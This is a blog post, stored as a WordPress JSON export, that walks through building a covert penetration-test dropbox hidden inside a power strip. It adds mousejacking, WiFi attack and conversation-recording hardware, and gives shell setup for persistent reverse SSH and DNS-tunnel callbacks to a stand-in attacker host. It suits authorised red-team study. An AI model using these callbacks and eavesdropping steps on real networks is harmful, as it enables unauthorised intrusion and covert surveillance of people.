{"id":548,"date":"2025-12-23T11:42:43","date_gmt":"2025-12-23T10:42:43","guid":{"rendered":"https:\/\/www.hardwaresecurity.it\/?p=548"},"modified":"2025-12-23T11:42:43","modified_gmt":"2025-12-23T10:42:43","slug":"potaebox-the-lost-pentest-dropbox","status":"publish","type":"post","link":"https:\/\/www.hardwaresecurity.it\/?p=548","title":{"rendered":"POTAEbox: The Lost Pentest Dropbox"},"content":{"rendered":"\n<p class=\"has-text-align-center\">One of my biggest regrets during the last years is that I have never got enough time to continue a side project that I care(d) quite a lot: POTAEbox. What\u2019s it? It\u2019s a Pentest Dropbox, in particular, it stands for Penetration Over The Air &amp; Ethernet box.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"305\" src=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/aeba7dc5-d85e-4011-9bd5-6c8f591b2a8a.png\" alt=\"aPNG\" class=\"wp-image-550\" title=\"POTAEbox: The Lost Pentest Dropbox\" srcset=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/aeba7dc5-d85e-4011-9bd5-6c8f591b2a8a.png 624w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/aeba7dc5-d85e-4011-9bd5-6c8f591b2a8a-300x147.png 300w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/aeba7dc5-d85e-4011-9bd5-6c8f591b2a8a-600x293.png 600w\" sizes=\"auto, (max-width: 624px) 100vw, 624px\" \/><\/figure>\n\n\n\n<p class=\"has-text-align-center\">The plan was to create some prototypes to check if the idea works and then move into the R&amp;D phases: SoCs evaluation and procurement, features gathering, PCB design, etc. Eventually between a new baby in the family, new responsibilities at work, COVID &amp; the famously-hated chip shortage\u2026 everything got delayed.<\/p>\n\n\n\n<p class=\"has-text-align-center\">Anyway, for sake of sharing some good tech know-how and hoping this article will be of inspiration for some hacker out there\u2026 here I am writing a small tutorial on how to build such kind of pentest dropbox. Of course, it is not an exhaustive walkthrough, but it gives enough insights on what usually I place inside a pentest dropbox (except for the 3G\/4G modem to callback safely with an OOB covert channel).<\/p>\n\n\n\n<p class=\"has-text-align-center\">First of all, here a small recap of the major prototypes I have developed in the past 15 years of pentests. The first and second generation were made with not-so-optimized piece of hardware (i.e. they were bulky and expensive).<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"304\" src=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/abaab681-e8d3-4aac-9ec1-4bb2ccc5a538.png\" alt=\"bPNG\" class=\"wp-image-552\" title=\"POTAEbox: The Lost Pentest Dropbox\" srcset=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/abaab681-e8d3-4aac-9ec1-4bb2ccc5a538.png 624w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/abaab681-e8d3-4aac-9ec1-4bb2ccc5a538-300x146.png 300w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/abaab681-e8d3-4aac-9ec1-4bb2ccc5a538-600x292.png 600w\" sizes=\"auto, (max-width: 624px) 100vw, 624px\" \/><\/figure>\n\n\n\n<p class=\"has-text-align-center\">Then, around 2016 it happened the revolution. From China started to pop-up many SBCs (Single Board Computers) with the perfect form-size that allowed to fit them into small COTS cases. This led me to start purchasing and evaluating many SBCs (if not all of them). as you can see in the image below.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"295\" height=\"394\" src=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/762710f2-ce40-44b1-b883-3779aa703fb7.png\" alt=\"cPNG\" class=\"wp-image-551\" title=\"POTAEbox: The Lost Pentest Dropbox\" srcset=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/762710f2-ce40-44b1-b883-3779aa703fb7.png 295w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/762710f2-ce40-44b1-b883-3779aa703fb7-225x300.png 225w\" sizes=\"auto, (max-width: 295px) 100vw, 295px\" \/><\/figure>\n\n\n\n<p class=\"has-text-align-center\">In the image below you can see one of my favorite COTS cases: a Powerline adaptor created by DEVOLO. This commercial device (i.e. Devolo Duo), once stripped of the original internal PCBs, allows to fit a small USB 5V 2A power supply and one of those Chinese SBCs (i.e. NanoPi, OrangePi, etc).<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"650\" height=\"650\" src=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/78cd953f-8c05-4b5d-bc86-09b5aab7867a.jpg\" alt=\"djpg\" class=\"wp-image-549\" title=\"POTAEbox: The Lost Pentest Dropbox\" srcset=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/78cd953f-8c05-4b5d-bc86-09b5aab7867a.jpg 650w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/78cd953f-8c05-4b5d-bc86-09b5aab7867a-300x300.jpg 300w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/78cd953f-8c05-4b5d-bc86-09b5aab7867a-150x150.jpg 150w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/78cd953f-8c05-4b5d-bc86-09b5aab7867a-600x600.jpg 600w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/78cd953f-8c05-4b5d-bc86-09b5aab7867a-100x100.jpg 100w\" sizes=\"auto, (max-width: 650px) 100vw, 650px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"289\" height=\"321\" src=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/6437bdab-f714-4d66-ba15-888a1c068a9b.png\" alt=\"fpng\" class=\"wp-image-554\" title=\"POTAEbox: The Lost Pentest Dropbox\" srcset=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/6437bdab-f714-4d66-ba15-888a1c068a9b.png 289w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/6437bdab-f714-4d66-ba15-888a1c068a9b-270x300.png 270w\" sizes=\"auto, (max-width: 289px) 100vw, 289px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"322\" height=\"369\" src=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/fff4965d-ace3-423a-aa6b-e0340fa9d07d.png\" alt=\"epng\" class=\"wp-image-555\" title=\"POTAEbox: The Lost Pentest Dropbox\" srcset=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/fff4965d-ace3-423a-aa6b-e0340fa9d07d.png 322w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/fff4965d-ace3-423a-aa6b-e0340fa9d07d-262x300.png 262w\" sizes=\"auto, (max-width: 322px) 100vw, 322px\" \/><\/figure>\n\n\n\n<p class=\"has-text-align-center\">At this point, you already have an acceptable Pentest Dropbox that can be placed into the premises of your target. Of course, it has the bare minimum functionality (i.e. once connected into the target\u2019s LAN can callback your C2 through the target network over Iodine &amp; AutoSSH). This approach of course has all disadvantages of the case, right Purple Teamers?! But is also a good starting point to check how secure (i.e. NAC, 801.x, SIEM, NIDS, etc) is the LAN and if the SOC has proper detection and response capabilities.&nbsp;<\/p>\n\n\n\n<p class=\"has-text-align-center\">Another approach to get a more powerful POTAEbox, was to move from one COTS case to another. For this new prototype I was looking for something more spacious to allow more features in it, in particular I wanted to be able to do:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Mousejacking Attacks:<\/strong> therefore, I needed a NRF24L chipset. For this I opted to a USB-based CrazyRadioPA.<\/li>\n\n\n\n<li><strong>Wifi Attacks:<\/strong> therefore, I needed a proper WiFi chipset. The choice was the classic Atheros AR9271, which is fully supported by Aircrack-ng and all other offensive tools.<\/li>\n\n\n\n<li><strong>Ethernet Attacks:<\/strong> therefore, I needed a dual-ethernet SBC like the OrangePi R1. I know, is not optimal, but \u00a0it gets the job done.<\/li>\n\n\n\n<li><strong>Acoustic Surveillance:<\/strong> sometimes during an engagement I need to record conversations, since the OrangePi R1 SBC had the Mic-input feature available, I took the chance to implement this feature as well.<\/li>\n<\/ul>\n\n\n\n<p class=\"has-text-align-center\">Eventually, I managed to find the perfect COTS case: an ORICO powerstrip that had enough room for what I needed!<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"457\" height=\"408\" src=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/4d686ba2-45ed-41ec-b157-93b72adb8918.jpg\" alt=\"gjpg\" class=\"wp-image-553\" title=\"POTAEbox: The Lost Pentest Dropbox\" srcset=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/4d686ba2-45ed-41ec-b157-93b72adb8918.jpg 457w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/4d686ba2-45ed-41ec-b157-93b72adb8918-300x268.jpg 300w\" sizes=\"auto, (max-width: 457px) 100vw, 457px\" \/><\/figure>\n\n\n\n<p>Let\u2019s recap what are the main parts needed for this POTAEbox prototype:<\/p>\n\n\n\n<p>A. &nbsp; &nbsp; CrazyRadio PA<\/p>\n\n\n\n<p>B. &nbsp; &nbsp; Atheros AR9721-based USB WiFi adaptor<\/p>\n\n\n\n<p>C. &nbsp; &nbsp; OrangePi R1<\/p>\n\n\n\n<p>D. &nbsp; &nbsp; ORICO powerstrip<\/p>\n\n\n\n<p>E. &nbsp; &nbsp; &nbsp; Homemade circuit amplifier\/filter and microphone<\/p>\n\n\n\n<p class=\"has-text-align-center\">F. &nbsp; &nbsp; &nbsp; Small USB Powersupply 5V 2A (is important being a 2+ Ampere!)<img decoding=\"async\" alt=\"hjpg\" src=\"https:\/\/files.gandi.ws\/c9\/e6\/c9e66759-3761-4602-98b4-9706e34c8898.jpg\" title=\"POTAEbox: The Lost Pentest Dropbox\"><\/p>\n\n\n\n<p class=\"has-text-align-center\">Arrived at this point, I won\u2019t describe in detail all the minor steps I followed to get everything set. I assume that anyone that attempts to build their own POTAEbox prototype has some experience in electronics and soldering components. What you need to know is the OrangePi R1 pinout, and here it is:<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"649\" height=\"340\" src=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/b66ffc0a-cfa5-4f6e-bc4a-985c08965f94.jpg\" alt=\"ijpg\" class=\"wp-image-556\" title=\"POTAEbox: The Lost Pentest Dropbox\" srcset=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/b66ffc0a-cfa5-4f6e-bc4a-985c08965f94.jpg 649w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/b66ffc0a-cfa5-4f6e-bc4a-985c08965f94-300x157.jpg 300w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/b66ffc0a-cfa5-4f6e-bc4a-985c08965f94-600x314.jpg 600w\" sizes=\"auto, (max-width: 649px) 100vw, 649px\" \/><\/figure>\n\n\n\n<p>Overall, what I have done was to connect:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The microphone amplifier\/filter circuit to the exposed MIC pins (MIC1N, MIC1P, MIC-BIAS)<\/li>\n\n\n\n<li>The power cables from the PSU to the OrangePi\u2019s pins (5V &amp; GND)<\/li>\n\n\n\n<li>The Crazyradio &amp; the AR9721 to the exposed USB pins (5V, GND, USB-DP3, USB-DM3, USB-DP2, USB-DM2)<\/li>\n<\/ul>\n\n\n\n<p class=\"has-text-align-center\"><strong>Tips &amp; Tricks:<\/strong><\/p>\n\n\n\n<p class=\"has-text-align-center\"><strong>Microphone circuit notes: <\/strong>The circuit is pretty simple and straightforward, you\u2019ll need two 100nF capacitors and two resistors of 2.2KOhm. That\u2019s it. Reason why I didn\u2019t even bother to design the PCB on KiCAD and went directly in PROD with a protoboard.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"318\" height=\"328\" src=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/612ec9cb-4be0-46be-8155-18c4d5251933.png\" alt=\"jpng\" class=\"wp-image-557\" title=\"POTAEbox: The Lost Pentest Dropbox\" srcset=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/612ec9cb-4be0-46be-8155-18c4d5251933.png 318w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/612ec9cb-4be0-46be-8155-18c4d5251933-291x300.png 291w\" sizes=\"auto, (max-width: 318px) 100vw, 318px\" \/><\/figure>\n\n\n\n<p class=\"has-text-align-center\"><strong>Nylon Spacers:<\/strong> for the OrangePi R1 installation I have used some nylon spacers to make it easy the process of sticking the SBC with hotglue on the internal ORICO ABS case.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"731\" height=\"501\" src=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/267ae6c8-c841-4167-9af5-8b4288f67cf3.jpg\" alt=\"kjpg\" class=\"wp-image-558\" title=\"POTAEbox: The Lost Pentest Dropbox\" srcset=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/267ae6c8-c841-4167-9af5-8b4288f67cf3.jpg 731w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/267ae6c8-c841-4167-9af5-8b4288f67cf3-300x206.jpg 300w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/267ae6c8-c841-4167-9af5-8b4288f67cf3-600x411.jpg 600w\" sizes=\"auto, (max-width: 731px) 100vw, 731px\" \/><\/figure>\n\n\n\n<p class=\"has-text-align-center\"><strong>Desolder USB &amp; SMA connectors: <\/strong>Inside the ORICO case we have limited space, therefore I always opt to remove unneeded connectors.<\/p>\n\n\n\n<p class=\"has-text-align-center\"><img loading=\"lazy\" decoding=\"async\" width=\"227\" height=\"371\" src=\"https:\/\/files.gandi.ws\/10\/71\/107138eb-e477-4841-a918-e2e7daf54a6d.jpg\" alt=\"ljpg\" title=\"POTAEbox: The Lost Pentest Dropbox\"><\/p>\n\n\n\n<p class=\"has-text-align-center\">Finally, this is how it looks once the components are placed inside the ORICO case. I know, is not the most appealing thing you may have seen, but it works damn good for a prototype.<\/p>\n\n\n\n<p class=\"has-text-align-center\"><img decoding=\"async\" src=\"https:\/\/files.gandi.ws\/8e\/0c\/8e0c5414-e774-488d-a51f-f6b678f25b23.jpg\" alt=\"njpg\" title=\"POTAEbox: The Lost Pentest Dropbox\"><\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"1071\" height=\"1430\" src=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/5f88bbe9-af7b-463e-bcbe-bbf6cb3784ef.jpg\" alt=\"ojpg\" class=\"wp-image-559\" title=\"POTAEbox: The Lost Pentest Dropbox\" srcset=\"https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/5f88bbe9-af7b-463e-bcbe-bbf6cb3784ef.jpg 1071w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/5f88bbe9-af7b-463e-bcbe-bbf6cb3784ef-225x300.jpg 225w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/5f88bbe9-af7b-463e-bcbe-bbf6cb3784ef-767x1024.jpg 767w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/5f88bbe9-af7b-463e-bcbe-bbf6cb3784ef-768x1025.jpg 768w, https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/5f88bbe9-af7b-463e-bcbe-bbf6cb3784ef-600x801.jpg 600w\" sizes=\"auto, (max-width: 1071px) 100vw, 1071px\" \/><\/figure>\n\n\n\n<p class=\"has-text-align-center\">Now that the building walk-through is done, let me drop here some good notes on how to configure your new POTAEbox prototype to call back home over a DNS tunnel by using Iodine and over the more classic SSH tunnel with AutoSSH.<\/p>\n\n\n\n<p><strong>Pre-Setup:<\/strong><\/p>\n\n\n\n<p>After flashed the IMG on the SD card, you can turn on the SBC with attached the ETH and it will get an IP from DHCP. Then you are ready to login over ssh (default: root\/orangepi).<\/p>\n\n\n\n<p>Remember to expand FS after first boot:<\/p>\n\n\n\n<p><em>cd \/usr\/local\/sbin<\/em><\/p>\n\n\n\n<p><em>resize_rootfs.sh<\/em><\/p>\n\n\n\n<p><strong>Update &amp; Dependencies<\/strong><\/p>\n\n\n\n<p><em>apt-get update &amp;&amp; apt-get upgrade -y<\/em><\/p>\n\n\n\n<p><em>apt-get install screen htop nmap python python-pip python3-python3-pip aircrack-ng git tpcdump autossh<\/em><\/p>\n\n\n\n<p><em>ldconfig<\/em><\/p>\n\n\n\n<p><em>pip install impacket<\/em><\/p>\n\n\n\n<p><strong>Setup Metasploit:<\/strong><\/p>\n\n\n\n<p><em>curl <\/em><a href=\"https:\/\/raw.githubusercontent.com\/rapid7\/metasploit-omnibus\/master\/config\/templates\/metasploit-framework-wrappers\/msfupdate.erb\"><em>https:\/\/raw.githubusercontent.com\/rapid7\/metasploit-omnibus\/master\/config\/templates\/metasploit-frame&#8230;<\/em><\/a><em> &gt; msfinstall &amp;&amp; &nbsp; chmod 755 msfinstall &amp;&amp; &nbsp; .\/msfinstall<\/em><\/p>\n\n\n\n<p><strong>Setup .bashrc:<\/strong><\/p>\n\n\n\n<p>In \/root\/.bashrc add the following lines, save and reload them with \u201csource \/root\/.bashrc\u201d:<\/p>\n\n\n\n<p><em>alias openports=&#8217;netstat -ntlp&#8217;<\/em><\/p>\n\n\n\n<p><em>alias openportsudp=&#8217;netstat -ntlpu&#8217;<\/em><\/p>\n\n\n\n<p><em>alias publicIP=&#8217;wget <\/em><a href=\"http:\/\/ipinfo.io\/ip\"><em>http:\/\/ipinfo.io\/ip<\/em><\/a><em> -qO -&#8216;<\/em><\/p>\n\n\n\n<p><em>alias ssh2C2=&#8217;ssh root@ATTACKER.COM -i \/root\/.ssh\/id_rsa&#8217;<\/em><\/p>\n\n\n\n<p><strong>Tips about known_hosts:<\/strong><\/p>\n\n\n\n<p>In the OrangePi\u2019s ~\/.ssh\/config OR \/etc\/ssh\/ssh_config (if this file doesn&#8217;t exist, just create it) leave only these lines uncommented:<\/p>\n\n\n\n<p><em>Host *<\/em><\/p>\n\n\n\n<p><em>CheckHostIP no<\/em><\/p>\n\n\n\n<p><em>StrictHostKeyChecking no<\/em><\/p>\n\n\n\n<p><strong>Setup AutoSSH:<\/strong><\/p>\n\n\n\n<p>Generate id_rsa and id_rsa.pub with:<\/p>\n\n\n\n<p><em>ssh-keygen<\/em><\/p>\n\n\n\n<p>Then copy the \/root\/ssh\/id_rsa.pub into the C2 \/root\/.ssh\/authorized_keys<\/p>\n\n\n\n<p>Create a file with Nano\/Vim called \/root\/callbackssh.sh<\/p>\n\n\n\n<p><em>#!\/bin\/bash<\/em><\/p>\n\n\n\n<p><em>autossh -M 11201 -N -f -o &#8220;PubkeyAuthentication=yes&#8221; -o &#8220;PasswordAuthentication=no&#8221; -i \/root\/.ssh\/id_rsa -R 7201:localhost:22 root@ATTACKER.COM &amp;<\/em><\/p>\n\n\n\n<p>Give proper permissions to the bash script<\/p>\n\n\n\n<p><em>chmod +x \/root\/callbackssh.sh<\/em><\/p>\n\n\n\n<p><strong>Setup Iodine DNS Tunnel Callback:<\/strong><\/p>\n\n\n\n<p>Of course, the main prerequisite here is to have already setup a subdomain for Iodine. Check <a href=\"https:\/\/github.com\/yarrick\/iodine#server-side\">https:\/\/github.com\/yarrick\/iodine#server-side<\/a> for more information!<\/p>\n\n\n\n<p>Create a file with Nano\/Vim called \/root\/callbackdns.sh<\/p>\n\n\n\n<p><em>#!\/bin\/bash<\/em><\/p>\n\n\n\n<p><em>\/bin\/pidof iodine<\/em><\/p>\n\n\n\n<p><em>if [[ $? -ne 0 ]]; then<\/em><\/p>\n\n\n\n<p><em>&nbsp; echo Restarting<\/em><\/p>\n\n\n\n<p><em>&nbsp; \/usr\/sbin\/iodine -f -P MYLONGPASSWORD potaebox.ATTACKER.COM &amp;<\/em><\/p>\n\n\n\n<p><em>fi<\/em><\/p>\n\n\n\n<p>Give proper permissions to the bash script<\/p>\n\n\n\n<p><em>chmod +x \/root\/callbackdns.sh<\/em><\/p>\n\n\n\n<p>Setup Crontab persistence for both autossh and Iodine with crontab -e:<\/p>\n\n\n\n<p><em>*\/1 * * * * \/root\/callbackdns.sh &gt; \/root\/potaeboxDNS.log 2&gt;&amp;1<\/em><\/p>\n\n\n\n<p><em>*\/5 * * * * \/root\/callbackssh.sh &gt; \/dev\/null 2&gt;&amp;1<\/em><\/p>\n\n\n\n<p><strong>Setup C2 Server side:<\/strong><\/p>\n\n\n\n<p>Now we are done setting up the POTAEbox side, we need to quickly configure the C2 Server side.<\/p>\n\n\n\n<p>In .bashrc file add the following lines:<\/p>\n\n\n\n<p><em>alias tunnelDNSstop=&#8217;killall -9 iodined&#8217;<\/em><\/p>\n\n\n\n<p><em>alias findDNSTunnel=&#8217;fping -ag 10.1.2.1\/24&#8242;<\/em><\/p>\n\n\n\n<p><em>alias autosshOrangePiR1_ORICO_1=&#8217;ssh root@localhost -p 7201&#8242;<\/em><\/p>\n\n\n\n<p>Create a file with Nano\/Vim called \/root\/callbackdns.sh<\/p>\n\n\n\n<p><em>#!\/bin\/bash<\/em><\/p>\n\n\n\n<p><em>\/bin\/pidof iodined<\/em><\/p>\n\n\n\n<p><em>if [[ $? -ne 0 ]]; then<\/em><\/p>\n\n\n\n<p><em>&nbsp; echo Restarting<\/em><\/p>\n\n\n\n<p><em>&nbsp; \/usr\/sbin\/iodined -f -c -P MYLONGPASSWORD 10.1.2.1 potaebox.ATTACKER.COM &amp;<\/em><\/p>\n\n\n\n<p><em>fi<\/em><\/p>\n\n\n\n<p>Give proper permissions to the bash script<\/p>\n\n\n\n<p><em>chmod +x \/root\/callbackdns.sh<\/em><\/p>\n\n\n\n<p>Finally, add the scheduled task with crontab -e:<\/p>\n\n\n\n<p><em>*\/1 * * * * \/root\/callbackdns.sh &gt; \/root\/potaeboxDNS.log 2&gt;&amp;1<\/em>&nbsp;<\/p>\n\n\n\n<p><strong>Congrats! You are done with the setup!<\/strong><\/p>\n\n\n\n<p>Just to save some of your time, here a couple of tips on how to get the acoustic surveillance and the mousejacking features working:&nbsp;<\/p>\n\n\n\n<p><strong>Get Microphone working:<\/strong><\/p>\n\n\n\n<p>Run alsamixer, hit F4 then on mic 1 press space to enable it.&nbsp;<\/p>\n\n\n\n<p>To record audio:<\/p>\n\n\n\n<p><em>&nbsp;arecord -M -f S16_LE -r 16000 -c 1 &#8211;buffer-size=204800 -v sample2.wav &#8211;duration=10<\/em>&nbsp;<\/p>\n\n\n\n<p><strong>Get Mousejacking working:<\/strong><\/p>\n\n\n\n<p>Install Jackit and have fun: <a href=\"https:\/\/github.com\/insecurityofthings\/jackit\">https:\/\/github.com\/insecurityofthings\/jackit<\/a>&nbsp;<\/p>\n\n\n\n<h4 class=\"wp-block-heading has-text-align-center\"><strong>Final words<\/strong><\/h4>\n\n\n\n<p class=\"has-text-align-center\">With this tutorial you have enough information to start building your own POTAEbox prototype! Said that, time permitting, I will be back with some good news and maybe a new version!<\/p>\n\n\n\n<p class=\"has-text-align-center\">As usual, hack responsibly and stay tuned at <a href=\"https:\/\/twitter.com\/whid_ninja\">https:\/\/twitter.com\/whid_ninja<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading has-text-align-center\"><strong>WHID&#8217;s Trainings<\/strong><\/h3>\n\n\n\n<p class=\"has-text-align-center\">The Offensive Hardware Hacking Training is a Self-Paced training including Videos, a printed Workbook and a cool Hardware Hacking Kit. And\u2026 you get everything shipped home Worldwide!<br>For more info\u2026<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"Offensive Hardware Hacking Training\" width=\"500\" height=\"281\" src=\"https:\/\/www.youtube.com\/embed\/zbUuBZJIHkE?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>One of my biggest regrets during the last years is that I have never got enough time to continue a [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":505,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[24],"tags":[],"class_list":["post-548","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-redteam"],"uagb_featured_image_src":{"full":["https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/poteabox.jpg",1536,2048,false],"thumbnail":["https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/poteabox-150x150.jpg",150,150,true],"medium":["https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/poteabox-225x300.jpg",225,300,true],"medium_large":["https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/poteabox-768x1024.jpg",768,1024,true],"large":["https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/poteabox-768x1024.jpg",768,1024,true],"1536x1536":["https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/poteabox-1152x1536.jpg",1152,1536,true],"2048x2048":["https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/poteabox.jpg",1536,2048,false],"woocommerce_thumbnail":["https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/poteabox-300x300.jpg",300,300,true],"woocommerce_single":["https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/poteabox-600x800.jpg",600,800,true],"woocommerce_gallery_thumbnail":["https:\/\/www.hardwaresecurity.it\/wp-content\/uploads\/2025\/12\/poteabox-100x100.jpg",100,100,true]},"uagb_author_info":{"display_name":"admin","author_link":"https:\/\/www.hardwaresecurity.it\/?author=1"},"uagb_comment_info":0,"uagb_excerpt":"One of my biggest regrets during the last years is that I have never got enough time to continue a 